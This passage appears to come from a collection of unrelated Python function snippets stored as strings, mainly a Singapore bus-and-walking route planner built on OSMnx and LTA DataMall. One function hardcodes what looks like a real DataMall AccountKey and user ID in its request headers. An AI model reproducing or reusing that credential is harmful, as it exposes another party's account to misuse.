logging.getLogger().isEnabledFor(logging.DEBUG):\n logging.debug(\"processing entity : %s\", entity)\n else:\n logging.info(\"processing entity : %s\", entity.get(GUID_STR))\n\n if index > 0:\n yield \",\"\n booking_guid = entity.get(GUID_STR)\n iata = entity.get(IATA_STR)\n api_key = resolve_api_key(API_KEYS, iata)\n\n if not isinstance(api_key, str):\n entity[PROP] = []\n yield json.dumps(entity)\n continue\n url = URL_TEMPLATE.render(entity) + booking_guid + \"?api_key=\" + api_key\n if METHOD == \"get\":\n entity[PROP] = requests.get(url, headers=HEADERS).json()\n else:\n entity[PROP] = requests.request(METHOD, url, data=entity.get(\"payload\"),\n headers=HEADERS).json()\n yield json.dumps(entity)\n yield \"]\"\n\n # get entities from request\n entities = request.get_json()\n\n # create the response\n logging.debug(\"Processing %i entities\", len(entities))\n return Response(generate(entities), mimetype='application/json')", "def index():\n # curl -k -X POST https://127.0.0.1:43210/api/v1.0 -H 'content-type: application/json' -d '{\"data\": \"exhaust\"}'\n return jsonify({'meta': {'success': True, 'code': 200}, 'result': {\"message\": request.get_json()}}), 200", "def StartDrillHole(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def monkey_patch_requests_for_xray():\n wrapt.wrap_function_wrapper(\n \"requests.sessions\", \"Session.send\", xray_requests_send,\n )", "def gen_livestream():\n\n flag = True\n frame = _dog()\n while True:\n time.sleep(0.02)\n if app.images.qsize():\n image = app.images.get()\n if flag:\n image = base64_to_cv2(image)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n detector = dlib.get_frontal_face_detector()\n rects = detector(gray, 0)\n for (i, rect) in enumerate(rects):\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n \n for (x, y) in shape:\n cv2.circle(image, (x, y), 2, (0, 255, 0), -1)\n _, frame = cv2.imencode('.jpg', image)\n else:\n frame = _dog()\n # print(position)\n flag = not flag\n # yield ('Content-Type: image/jpeg\\r\\n\\r\\n' + base64.b64encode(frame).decode(\"utf-8\") + '\\r\\n')\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def protect_endpoint():\n pass", "def walk_bus_algor(start,end):\n #---CLASSES---#\n class my_dictionary(dict):\n \"\"\"\n Creates a dictionary\n \"\"\"\n def __init__(self):\n self = dict()\n def add(self, key, 
value):\n self[key] = value\n\n #---FUNCTIONS---#\n def bus_layer(start,end, results, case):\n \"\"\"\n It generates a bus route with the bus numbers via greedy algorithm\n\n Parameters\n ----------\n start : node id\n end : node id\n results : dict (From lta datamall)\n case : int\n Returns\n -------\n final_route_list : list\n \"\"\"\n def overpass_request(data, pause_duration=None, timeout=180, error_pause_duration=None):\n \"\"\"\n Send a request to the Overpass API via HTTP POST and return the JSON\n response.\n Parameters\n ----------\n data : dict or OrderedDict\n key-value pairs of parameters to post to the API\n pause_duration : int\n how long to pause in seconds before requests, if None, will query API\n status endpoint to find when next slot is available\n timeout : int\n the timeout interval for the requests library\n error_pause_duration : int\n how long to pause in seconds before re-trying requests if error\n Returns\n -------\n dict\n \"\"\"\n\n # define the Overpass API URL, then construct a GET-style URL as a string to\n # hash to look up/save to cache\n url = settings.overpass_endpoint.rstrip('/') + '/interpreter'\n prepared_url = requests.Request('GET', url, params=data).prepare().url\n cached_response_json = get_from_cache(prepared_url)\n\n if cached_response_json is not None:\n # found this request in the cache, just return it instead of making a\n # new HTTP call\n return cached_response_json\n\n else:\n # if this URL is not already in the cache, pause, then request it\n if pause_duration is None:\n this_pause_duration = get_pause_duration()\n log('Pausing {:,.2f} seconds before making API POST request'.format(this_pause_duration))\n time.sleep(this_pause_duration)\n start_time = time.time()\n log('Posting to {} with timeout={}, \"{}\"'.format(url, timeout, data))\n response = requests.post(url, data=data, timeout=timeout, headers=get_http_headers())\n\n # get the response size and the domain, log result\n size_kb = len(response.content) / 1000.\n domain = re.findall(r'(?s)//(.*?)/', url)[0]\n log('Downloaded {:,.1f}KB from {} in {:,.2f} seconds'.format(size_kb, domain, time.time() - start_time))\n\n try:\n response_json = response.json()\n if 'remark' in response_json:\n log('Server remark: \"{}\"'.format(response_json['remark'], level=lg.WARNING))\n save_to_cache(prepared_url, response_json)\n except Exception:\n # 429 is 'too many requests' and 504 is 'gateway timeout' from server\n # overload - handle these errors by recursively calling\n # overpass_request until we get a valid response\n if response.status_code in [429, 504]:\n # pause for error_pause_duration seconds before re-trying request\n if error_pause_duration is None:\n error_pause_duration = get_pause_duration()\n log(\n 'Server at {} returned status code {} and no JSON data. 
Re-trying request in {:.2f} seconds.'.format(\n domain,\n response.status_code,\n error_pause_duration),\n level=lg.WARNING)\n time.sleep(error_pause_duration)\n response_json = overpass_request(data=data, pause_duration=pause_duration, timeout=timeout)\n\n # else, this was an unhandled status_code, throw an exception\n else:\n log('Server at {} returned status code {} and no JSON data'.format(domain, response.status_code),\n level=lg.ERROR)\n raise Exception(\n 'Server returned no JSON data.\\n{} {}\\n{}'.format(response, response.reason, response.text))\n\n return response_json\n def get_node(element):\n \"\"\"\n Convert an OSM node element into the format for a networkx node.\n\n Parameters\n ----------\n element : dict\n an OSM node element\n\n Returns\n -------\n dict\n \"\"\"\n useful_tags_node = ['ref', 'highway', 'route_ref', 'asset_ref']\n\n node = {}\n node['y'] = element['lat']\n node['x'] = element['lon']\n node['osmid'] = element['id']\n\n\n if 'tags' in element:\n for useful_tag in useful_tags_node:\n if useful_tag in element['tags']:\n node[useful_tag] = element['tags'][useful_tag]\n return node\n def get_path(element,element_r):\n \"\"\"\n Convert an OSM way element into the format for a networkx graph path.\n\n Parameters\n ----------\n element : dict\n an OSM way element\n element_r : dict\n an OSM way element\n\n Returns\n -------\n dict\n \"\"\"\n useful_tags_path_e = ['bridge', 'tunnel', 'oneway', 'lanes', 'name',\n 'highway', 'maxspeed', 'service', 'access', 'area',\n 'landuse', 'width', 'est_width', 'junction']\n\n useful_tags_path_r = ['bridge', 'tunnel', 'oneway', 'lanes', 'ref', 'direction', 'from', 'to', 'name',\n 'highway', 'maxspeed', 'service', 'access', 'area',\n 'landuse', 'width', 'est_width', 'junction']\n\n\n\n path = {}\n path['osmid'] = element['id']\n\n # remove any consecutive duplicate elements in the list of nodes\n grouped_list = groupby(element['nodes'])\n path['nodes'] = [group[0] for group in grouped_list]\n\n\n\n if 'tags' in element:\n # for relation in element_r['elements']:\n # if relation['type'] == 'relation':\n # for members in relation['members']:\n # if members['ref'] == element['id']:\n for useful_tag in useful_tags_path_e:\n if useful_tag in element['tags']:\n path[useful_tag] = element['tags'][useful_tag]\n # for useful_tag in useful_tags_path_r:\n # if useful_tag in relation['tags']:\n # try:\n # path[useful_tag] = path[useful_tag] + \";\" + relation['tags'][useful_tag]\n # except KeyError:\n # path[useful_tag] = relation['tags'][useful_tag]\n # pass\n\n return path\n def parse_osm_nodes_paths(osm_data):\n \"\"\"\n Construct dicts of nodes and paths with key=osmid and value=dict of\n attributes.\n\n Parameters\n ----------\n osm_data : dict\n JSON response from from the Overpass API\n\n Returns\n -------\n nodes, paths : tuple\n \"\"\"\n\n nodes = {}\n paths = {}\n relation = {}\n\n # for element in osm_data['elements']:\n # if element['type'] == 'relation':\n\n\n for element in osm_data['elements']:\n if element['type'] == 'node':\n key = element['id']\n nodes[key] = get_node(element)\n\n elif element['type'] == 'way': #osm calls network paths 'ways'\n key = element['id']\n # pp.pprint(element)\n paths[key] = get_path(element,osm_data)\n\n return nodes, paths\n def create_graph(response_jsons, name='unnamed', retain_all=True, bidirectional=False):\n \"\"\"\n Create a networkx graph from Overpass API HTTP response objects.\n\n Parameters\n ----------\n response_jsons : list\n list of dicts of JSON responses from from the Overpass 
API\n name : string\n the name of the graph\n retain_all : bool\n if True, return the entire graph even if it is not connected\n bidirectional : bool\n if True, create bidirectional edges for one-way streets\n\n Returns\n -------\n networkx multidigraph\n \"\"\"\n\n log('Creating networkx graph from downloaded OSM data...')\n start_time = time.time()\n\n # make sure we got data back from the server requests\n elements = []\n # for response_json in response_jsons:\n elements.extend(response_json['elements'])\n if len(elements) < 1:\n raise EmptyOverpassResponse('There are no data elements in the response JSON objects')\n\n # create the graph as a MultiDiGraph and set the original CRS to default_crs\n G = nx.MultiDiGraph(name=name, crs=settings.default_crs)\n\n # extract nodes and paths from the downloaded osm data\n nodes = {}\n paths = {}\n # for osm_data in response_jsons:\n nodes_temp, paths_temp = parse_osm_nodes_paths(response_jsons)\n for key, value in nodes_temp.items():\n nodes[key] = value\n for key, value in paths_temp.items():\n paths[key] = value\n\n # add each osm node to the graph\n for node, data in nodes.items():\n G.add_node(node, **data)\n\n # add each osm way (aka, path) to the graph\n G = ox.add_paths(G, paths, bidirectional=bidirectional)\n\n # retain only the largest connected component, if caller did not\n # set retain_all=True\n if not retain_all:\n G = get_largest_component(G)\n\n log('Created graph with {:,} nodes and {:,} edges in {:,.2f} seconds'.format(len(list(G.nodes())), len(list(G.edges())), time.time()-start_time))\n\n # add length (great circle distance between nodes) attribute to each edge to\n # use as weight\n if len(G.edges) > 0:\n G = ox.add_edge_lengths(G)\n\n return G\n def calculate_H(s_lat,s_lon,e_lat,e_lon):\n \"\"\"\n Calculate a distance with x,y coordinates with\n\n Parameters\n ----------\n s_lat : float (starting lat)\n s_lon : float (starting lon)\n e_lat : float (ending lat)\n e_lon : float (ending lon)\n\n Returns\n -------\n distance\n \"\"\"\n R = 6371.0\n snlat = radians(s_lat)\n snlon = radians(s_lon)\n elat = radians(e_lat)\n elon = radians(e_lon)\n actual_dist = 6371.01 * acos(sin(snlat) * sin(elat) + cos(snlat) * cos(elat) * cos(snlon - elon))\n actual_dist = actual_dist * 1000\n return actual_dist\n def bus_details_SD(adjacent_list):\n \"\"\"\n store all details from LTA data mall into dictionary\n\n Parameters\n ----------\n adjacent_list : dict\n\n Returns\n -------\n adjacent_list : dict\n \"\"\"\n\n temp = 0\n for x in results:\n if temp != x.get('ServiceNo'):\n temp = x.get('ServiceNo')\n count = 0\n adja_bus_stop = my_dictionary()\n adjacent_list.add(temp, adja_bus_stop)\n adja_bus_stop.add(count, [x.get('BusStopCode'), x.get('Distance')])\n count += 1\n else:\n adja_bus_stop.add(count, [x.get('BusStopCode'), x.get('Distance')])\n count += 1\n return adjacent_list\n def get_nearestedge_node(osm_id, a, G):\n \"\"\"\n Find the nearest node available in Open street map\n\n Parameters\n ----------\n osm_id : node ID\n a : plotting graph\n g : bus graph\n\n Returns\n -------\n temp_nearest_edge[1]/temp_nearest_edge[2] : nearest node to a way ID\n \"\"\"\n temp_y = G.nodes.get(osm_id).get('y')\n temp_x = G.nodes.get(osm_id).get('x')\n temp_nearest_edge = ox.get_nearest_edge(a, (temp_y, temp_x))\n temp_1 = temp_nearest_edge[0].coords[0]\n temp_2 = temp_nearest_edge[0].coords[1]\n temp1_x = temp_1[0]\n temp1_y = temp_1[1]\n temp_1_distance = calculate_H(temp1_y,temp1_x,temp_y,temp_x)\n\n temp2_x = temp_2[0]\n temp2_y = temp_2[1]\n 
temp_2_distance = calculate_H(temp2_y,temp2_x,temp_y,temp_x)\n if temp_1_distance < temp_2_distance:\n return temp_nearest_edge[1]\n else:\n return temp_nearest_edge[2]\n def delete_duplicate(x):\n \"\"\"\n Delete duplicate within a list\n\n Parameters\n ----------\n x : list\n\n Returns\n -------\n list\n \"\"\"\n return list(dict.fromkeys(x))\n def request_busG():\n \"\"\"\n Find all nodes that is a bus stop\n\n Returns\n -------\n busG : dict\n \"\"\"\n busG = {}\n for x in G.nodes.items():\n if x[1].get('highway') == 'bus_stop':\n xy = []\n xy.append(x[1].get('osmid'))\n xy.append(x[1].get('x'))\n xy.append(x[1].get('y'))\n busG[x[1].get('osmid')] = xy\n\n return busG\n\n # ---MAIN---#\n\n query_str = '[out:json][timeout:180];node[\"type\"=\"route\"](1.385700,103.887300,1.422000,103.925900);way[\"type\"=\"route\"](1.385700,103.887300,1.422000,103.925900);(relation[\"type\"=\"route\"](1.385700,103.887300,1.422000,103.925900);>;);out;'\n response_json = overpass_request(data={'data': query_str}, timeout=180)\n pp = pprint.PrettyPrinter(indent=4)\n # start = 1847853709\n # end = 410472575\n # end = 3737148763\n # bus transit\n # start = 2110621974\n # end = 2085845884\n\n adjacent_list = my_dictionary()\n\n G = ox.load_graphml('Bus_Overpass.graphml')\n\n if case == 1:\n return request_busG()\n n, e = ox.graph_to_gdfs(G)\n # e.to_csv(\"Edge_test_busstop.csv\")\n if len(results) == 0:\n\n results = bus_details_all(results) # Details from LTA Datamall, extracting all details such as service no, bus stop number\n\n adjacent_list = bus_details_SD(adjacent_list) # From results, it extracts bus stop number and distance\n start_busstop = (G.nodes.get(start)).get('asset_ref')\n end_busstop = (G.nodes.get(end)).get('asset_ref')\n\n #Start finding common bus service within the start bus stop and end bus stop\n try:\n if \";\" in (G.nodes.get(start).get('route_ref')):\n start_rr = (G.nodes.get(start).get('route_ref')).split(\";\")\n else:\n start_rr = []\n start_rr.append((G.nodes.get(start).get('route_ref')))\n print(\"TEST - G.nodes.get(end): \", G.nodes.get(end))\n if \";\" in (G.nodes.get(end).get('route_ref')):\n end_rr = (G.nodes.get(end).get('route_ref')).split(\";\")\n else:\n end_rr = []\n end_rr.append((G.nodes.get(end).get('route_ref')))\n common = list(set(start_rr) & set(end_rr))\n except:\n return -1\n\n \"\"\"\n This method strictly emphasis on greedy algorithm. Thus it will prioritze the numbers of transit rather than distance\n Check if any common bus service within start and end bus stop.\n If found, route_list will capture the entire route of the common bus service \n No transit will occuer as it is a straight path, start busstop -> end busstop\n If not found, the program will proceed to find a common bus stop within the start and end bus services. 
\n Thus a transit will occur, start busstop -> mid busstop -> end busstop\n \"\"\"\n route_list = {}\n mid_route_list = {}\n # print(\"TEST - Start: \", start_busstop)\n # print(\"TEST - End: \", end_busstop)\n # print(\"TEST - start_rr: \", start_rr)\n # print(\"TEST - end_rr: \", end_rr)\n # print(\"TEST - Common: \", common)\n common_mid = []\n if len(common) == 0: #No common bus service found\n while(len(common_mid) == 0): #Start finding a common mid busstop\n rona_one = []\n rona_two = []\n for start_to_mid in start_rr: #Capture all common mid busstop\n print(\"TEST - start_to_mid: \", start_to_mid)\n for bus_sequence in adjacent_list.get(start_to_mid):\n rona_one.append(str(adjacent_list.get(start_to_mid).get(bus_sequence)[0]))\n for mid_to_end in end_rr:\n print(\"TEST - mid_to_end: \", mid_to_end)\n for bus_sequence in adjacent_list.get(mid_to_end):\n rona_two.append(str(adjacent_list.get(mid_to_end).get(bus_sequence)[0]))\n found_br = []\n print(\"TEST rona 1:\", rona_one)\n print (\"TEST rona 2:\", rona_two)\n found_br.append(start_to_mid+\";\"+mid_to_end)\n found_br.extend(list(set(rona_one)&set(rona_two)))\n common_mid.append(found_br)\n\n print(\"TEST - common_mid: \",common_mid)\n\n bus_service = start_to_mid\n temp_bus = []\n mid_busstop = 0\n approved = 0\n for bus_sequence in adjacent_list.get(bus_service): #Finding bus service for start busstop -> mid busstop\n for x in range (0, len(common_mid)):\n for i in common_mid[x]:\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(start_busstop):\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 1\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(i) and approved == 1:\n mid_busstop = str(i)\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 0\n break\n if approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n if mid_busstop != 0:\n break\n if str(start_busstop) not in temp_bus or str(mid_busstop) not in temp_bus: #If not found, continue to next loop\n continue\n temp_bus = delete_duplicate(temp_bus)\n mid_route_list[bus_service] = temp_bus\n\n for x in G.nodes: #After finding bus service to mid busstop, start finding path mid busstop to end busstop\n if G.nodes.get(x).get('asset_ref') == mid_busstop:\n if \";\" in (G.nodes.get(x).get('route_ref')):\n start_rr = (G.nodes.get(x).get('route_ref')).split(\";\")\n else:\n start_rr = []\n start_rr.append((G.nodes.get(start).get('route_ref')))\n\n common = list(set(start_rr) & set(end_rr))\n start_busstop = mid_busstop\n if start == 1847853709: #If bus service started from punggol interchange\n for bus_service in common:\n temp_bus = []\n approved = 0\n for bus_sequence in adjacent_list.get(bus_service): #Capture bus route\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(start_busstop) and adjacent_list.get(bus_service).get(bus_sequence)[1] == 0:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 1\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(end_busstop) and approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 0\n break\n if approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n if str(start_busstop) not in temp_bus or str(end_busstop) not in temp_bus:\n continue\n route_list[bus_service] = temp_bus\n else:\n for bus_service in common: #If bus service does not start from punggol interchange\n 
temp_bus = []\n approved = 0\n for bus_sequence in adjacent_list.get(bus_service): #Capture bus route\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(start_busstop):\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 1\n if str(adjacent_list.get(bus_service).get(bus_sequence)[0]) == str(end_busstop) and approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n approved = 0\n break\n if approved == 1:\n temp_bus.append(adjacent_list.get(bus_service).get(bus_sequence)[0])\n if str(start_busstop) not in temp_bus or str(end_busstop) not in temp_bus:\n continue\n route_list[bus_service] = temp_bus\n\n \"\"\"\n After capturing all the bus serivce. A comparison is made in favor for the number of bus stops\n It will choose the least amount of bus stops and store in post_compare\n \"\"\"\n compare = [0, 100]\n if len(route_list.keys()) > 1:\n for i in route_list:\n if len(route_list.get(i)) < compare[1]:\n compare[0] = i\n compare[1] = len(route_list.get(i))\n else:\n for i in route_list:\n compare[0] = i\n compare[1] = len(route_list.get(i))\n post_compare = []\n print(\"TEST - Mid route list: \", mid_route_list)\n if len(mid_route_list) != 0:\n for i in mid_route_list:\n post_compare.append(i)\n route_list[i] = mid_route_list.get(i)\n post_compare.append(compare[0])\n else:\n post_compare.append(compare[0])\n\n\n\n \"\"\"\n Upon comparison, it will start capturing the nodes within the bus path and store in plot_list\n \"\"\"\n plot_list = []\n try:\n print(\"TEST - post_Compare: \", post_compare)\n print(\"TEST - Route list: \", route_list)\n for count in range (0, len(post_compare)):\n for x in route_list.get(str(post_compare[count])):\n for i in G.nodes:\n if str(G.nodes.get(i).get('asset_ref')) == str(x):\n plot_list.append(G.nodes.get(i).get('osmid'))\n break\n except:\n return -1\n edge_list = []\n punggol = (1.403948, 103.909048)\n \"\"\"\n It will generate out the list of node ID for the UI to plot\n \"\"\"\n a = ox.load_graphml('Bus_graph.graphml')\n for x in plot_list:\n edge_list.append(get_nearestedge_node(x,a,G))\n\n print(\"TEST - Plot list: \", plot_list)\n print(\"TEST - Edge list: \", edge_list)\n final_route_list = []\n count_stops = len(plot_list)\n for x in range (0, len(edge_list)-1):\n final_route_list.append(nx.shortest_path(a, edge_list[x], edge_list[x+1]))\n print(final_route_list)\n return final_route_list\n\n def bus_details_all():\n headers = {\n 'AccountKey': '84lbH3B/QeOkRK/CHm3c2w==',\n 'UniqueUserID': '8ecabd56-08a2-e843-0a7a-9944dccf124a',\n 'accept': 'application/json'\n }\n global new_results\n if __name__ == \"__main__\":\n results = []\n bus_stop_url = \"http://datamall2.mytransport.sg/ltaodataservice/BusRoutes\"\n\n while True:\n new_results = requests.get(bus_stop_url,headers=headers,params={'$skip': len(results)}).json()['value']\n if new_results == []:\n return results\n else:\n results += new_results\n def calculate_H(s_lat,s_lon,e_lat,e_lon): #y,x y,x\n R = 6371.0\n snlat = radians(s_lat)\n snlon = radians(s_lon)\n elat = radians(e_lat)\n elon = radians(e_lon)\n actual_dist = 6371.01 * acos(sin(snlat) * sin(elat) + cos(snlat) * cos(elat) * cos(snlon - elon))\n actual_dist = actual_dist * 1000\n return actual_dist\n def walk_pathfinder(start_osmid, end_osmid):\n priority_Q = []\n heap_Q = []\n closed_routes = {}\n start_node = (0, None, start_osmid, 0)\n heapq.heappush(heap_Q, (start_node))\n closed_routes[start_osmid] = None\n while(True):\n temp = heapq.heappop(heap_Q)\n 
if temp[2] == end_osmid:\n temp_end = end_osmid\n path = []\n path.append(end_osmid)\n while (temp_end is not None):\n temp_list = closed_routes.get(temp_end)\n if temp_list is not None:\n temp_end = temp_list[0]\n path.append(temp_end)\n else:\n final_path = path[::-1]\n return final_path\n\n for counter, x in enumerate(list(G.edges())[0:]):\n if x[0] == temp[2]:\n if x[1] in closed_routes:\n continue\n else:\n length = list(G.edges.values())[counter].get(\"length\", None)\n current_length = length + temp[3]\n slat = radians(G.nodes.get(x[1]).get('y'))\n slon = radians(G.nodes.get(x[1]).get('x'))\n dist = 6371.01 * acos(sin(slat) * sin(elat) + cos(slat) * cos(elat) * cos(slon - elon))\n H = dist*1000\n if H < actual_dist + 100:\n F = current_length + H\n heapq.heappush(heap_Q, (F, x[0], x[1], current_length))\n closed_routes[x[1]] = [x[0], length]\n def delete_duplicate(x):\n return list(dict.fromkeys(x))\n def get_nearestedge_node(osm_id, y , x):\n temp_nearest_edge = ox.get_nearest_edge(G, (y, x))\n temp_1 = temp_nearest_edge[0].coords[0]\n temp_2 = temp_nearest_edge[0].coords[1]\n temp1_x = temp_1[0]\n temp1_y = temp_1[1]\n temp_1_distance = calculate_H(temp1_y, temp1_x, y, x)\n temp2_x = temp_2[0]\n temp2_y = temp_2[1]\n temp_2_distance = calculate_H(temp2_y, temp2_x, y, x)\n if temp_1_distance < temp_2_distance:\n return [temp_nearest_edge[1],temp_1_distance,temp1_x,temp1_y]\n else:\n return [temp_nearest_edge[2],temp_2_distance,temp2_x,temp2_y]\n def find_XY(node, graph):\n for x in graph.nodes.items():\n if x[1].get('osmid') == node:\n node_x = x[1].get('x')\n node_y = x[1].get('y')\n node_list = (node_y, node_x)\n return node_list\n\n start_time = time.time()\n\n # start = (103.9028788, 1.4044948)\n # end = (103.8999124, 1.4035004)\n # start = (103.9073345, 1.4060506)\n # end = (103.9172982, 1.3956014)\n #\n # start = (103.9073345, 1.4060506)\n # end = (103.9172982, 1.3956014)\n\n # start = (103.910650, 1.400818)\n # end = (103.910296, 1.399252)\n\n # start =(103.9024 , 1.4052)\n # end = (103.897332 , 1.402272)\n\n # start = (103.91256451606752, 1.402580108598971)\n # end = (103.91270935535432, 1.401523634635178)\n\n start_osmid = 0\n end_osmid = 0\n punggol = (1.403948, 103.909048)\n # G = ox.graph_from_point(punggol, distance=3500, truncate_by_edge=True, network_type=\"walk\")\n G = ox.load_graphml('AStar_walk.graphml')\n nodelist_G = list(G.nodes.values())\n\n \"\"\"\n Start finding start and end Node ID.\n If not found, find nearest node from the given coordinates by the user\n \"\"\"\n for i in range (0, len(nodelist_G)):\n if nodelist_G[i].get('y') == start[1] and nodelist_G[i].get('x') == start[0]:\n start_osmid = nodelist_G[i].get('osmid')\n if nodelist_G[i].get('y') == end[1] and nodelist_G[i].get('x') == end[0]:\n end_osmid = nodelist_G[i].get('osmid')\n\n if start_osmid == 0 or end_osmid == 0:\n start_osmid = ox.get_nearest_node(G, (start[1], start[0]))\n end_osmid = ox.get_nearest_node(G, (end[1], end[0]))\n\n \"\"\"\n To calculate distance from 2 x,y axis\n \"\"\"\n R = 6371.0\n snlat = radians(start[1])\n snlon = radians(start[0])\n elat = radians(end[1])\n elon = radians(end[0])\n actual_dist = 6371.01 * acos(sin(snlat) * sin(elat) + cos(snlat) * cos(elat) * cos(snlon - elon))\n actual_dist = actual_dist*1000\n edgelist_G = list(G.edges.values())\n\n\n \"\"\"\n After having start and end nodes.\n The program will set a radius of 200 meters from start and end nodes\n Every nodes within 200 meters and is a bus stop node will be captured and stored in end1 and end2\n 
If within 200meters no bus stop is found, it will have a constant increment of 200meters until bus stop if found on both sides\n \"\"\"\n bus_G = bus_layer(start_osmid,end_osmid, None, 1)\n start1 = start\n start2 = end\n\n for i in bus_G:\n temp_dis = calculate_H(bus_G.get(i)[2],bus_G.get(i)[1],start1[1], start1[0])\n bus_G.get(i).append(temp_dis)\n temp_dis = calculate_H(bus_G.get(i)[2], bus_G.get(i)[1], start2[1], start2[0])\n bus_G.get(i).append(temp_dis)\n end1 = []\n end2 = []\n limit = 0\n while (len(end1) == 0):\n limit += 200\n for i in bus_G:\n if bus_G.get(i)[3] < limit:\n temp = []\n temp.append(bus_G.get(i)[3])\n temp.append(bus_G.get(i)[0])\n temp.append(bus_G.get(i)[1])\n temp.append(bus_G.get(i)[2])\n hq.heappush(end1, temp)\n limit = 0\n while (len(end2) == 0):\n limit += 200\n for i in bus_G:\n if bus_G.get(i)[4] < limit:\n temp = []\n temp.append(bus_G.get(i)[4])\n temp.append(bus_G.get(i)[0])\n temp.append(bus_G.get(i)[1])\n temp.append(bus_G.get(i)[2])\n hq.heappush(end2, temp)\n\n \"\"\"\n The following codes will capture all nodes on the road that is closest to the bus stop\n It will be stored in path1 and path2.\n \"\"\"\n path1 = []\n for i in range (0, len(end1)):\n if 1847853709 == end1[i][1]:\n path1 = []\n path1.append([2019165453, 0, 0, 0, 0])\n break\n else:\n path1.append(get_nearestedge_node(end1[i][1], end1[i][3], end1[i][2]))\n\n for x in range (0, len(path1)):\n path1[x].append(calculate_H(path1[x][3],path1[x][2], start1[1], start1[0]))\n\n path2 = []\n for i in range (0, len(end2)):\n path2.append(get_nearestedge_node(end2[i][1], end2[i][3], end2[i][2]))\n for x in range (0, len(path2)):\n path2[x].append(calculate_H(path2[x][3],path2[x][2], start2[1], start2[0]))\n\n \"\"\"\n Bus results will store all data obtained from lta datamall\n It will start calculating all possibilities from all bus stop captured in end1 and end2\n Example, end1 contains [1,2,3], end2 contains [4,5,6]\n The following code will start to find a route from [1,4] , [1,5] , [1,6] then [2,4] , [2,5] , [2,6] then [3,4] , [3,5] , [3,6]\n Once all these route is found, it will proceed to compare the derived routes and capture the least amount of bus stop\n Example, [1,4] is the shortest route found\n Upon capturing the route with the least amount of bus stop, it will start to plot the walking A* algorithm from start point to bus stop\n Example, [Start point, 1] then [End point, 4]\n In this case, it will return [[Start point,1] , [1,4] , [End point,4]]\n \"\"\"\n # bus_results = bus_details_all()\n # with open(\"data\\ltadatamall.txt\",\"w+\") as filehandler:\n # json.dump(bus_results,filehandler)\n with open(\"data\\ltadatamall.txt\", \"r\") as filehandler:\n bus_results=json.load(filehandler)\n approved = 0\n path1_end_count = 0\n path2_end_count = 0\n for i in range (0, len(end1)):\n if 1847853709 == end1[i][1]:\n approved = 1\n final_route_list = []\n if approved == 1:\n count = 99\n for x in range (0, len(end2)):\n final_route_list = bus_layer(1847853709, end2[x][1], bus_results, None)\n try:\n if len(final_route_list) < count:\n path1[path1_end_count][0] = 4598672210\n path2_end_count = x\n temp_route_list = final_route_list.copy()\n count = len(temp_route_list)\n except:\n continue\n else:\n count = 99\n if len(final_route_list) == 0:\n for i in range (0, len(end1)):\n for x in range (0, len(end2)):\n final_route_list = bus_layer(end1[i][1], end2[x][1], bus_results, None)\n if final_route_list == -1:\n continue\n if len(final_route_list) < count:\n path1_end_count = i\n 
path2_end_count = x\n temp_route_list = final_route_list\n count = len(temp_route_list)\n\n path1 = walk_pathfinder(start_osmid, path1[path1_end_count][0])\n path2 = walk_pathfinder(end_osmid, path2[path2_end_count][0])\n walking_Path1 = []\n walking_Path2 = []\n bus_path = []\n walking_Path2.append((end[1], end[0]))\n for x in path1:\n walking_Path1.append(find_XY(x, G))\n for x in path2:\n walking_Path2.append(find_XY(x, G))\n\n #ox.plot_graph_routes(G, [path1, path2])\n plotting_route = []\n \"\"\"\n Upon capturing all the bus routes and walking routes, it will proceed to return the route for further processing\n \"\"\"\n\n a = ox.load_graphml('WalkBus_end_graph.graphml')\n try:\n for x in temp_route_list:\n plotting_route.extend(x)\n plotting_route = delete_duplicate(plotting_route)\n Tried = True\n except:\n return [[0], [0], [0]]\n try:\n #ox.plot_graph_route(a, plotting_route)\n for x in plotting_route:\n bus_path.append(find_XY(x, a))\n except:\n #ox.plot_graph_routes(a, temp_route_list)\n Tried = False\n for x in plotting_route:\n for i in x:\n bus_path.append(find_XY(i, a))\n\n # print(\"TEST - Start OSMID: \", start_osmid)\n # print(\"TEST - End OSMID: \", end_osmid)\n # print(\"TEST - Path 1: \" ,path1)\n # print(\"TEST - Path 1 (X,Y): \", walking_Path1)\n # print(\"TEST - Path 2: \" ,path2)\n # print(\"TEST - Path 2 (X,Y): \", walking_Path2)\n # print(\"TEST - BusRoute: \", plotting_route)\n # print(\"TEST - Bus Path (X,Y): \", bus_path)\n # ox.plot_graph_route(G, final_path, fig_height=10, fig_width=10)\n if Tried == True:\n return [walking_Path1, bus_path, walking_Path2]\n else:\n return [walking_Path1, bus_path, walking_Path2]\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))", "def performOverflow(self, call):\n overFlowDest = self.getOverflowDest()\n if not overFlowDest:\n self.huntGroup.member_to_distribute = 0\n PrintLog(\"+++++++Debug: Under construction+++++\")\n return\n PrintLog(\"Waiting overflow timeout %s sec\" % self.overflowTimeout)\n time.sleep(self.overflowTimeout)\n if overFlowDest.tserver <> self.tserver:\n overFlowDest = self.trunk(self, overFlowDest)\n if InTrue(GetOption(\"CofFeature\")):\n call.ViaExtRouter = 1\n call.external = 1\n pt = self.partyToDistribute()\n thirdPartyDNRole = PartyRole.Destination\n if pt.Role == PartyRole.ConferenceMember and len(pt.Call.PartyList) >= 3:\n thirdPartyDNRole = PartyRole.ConferenceMember\n thirdPartyDN = 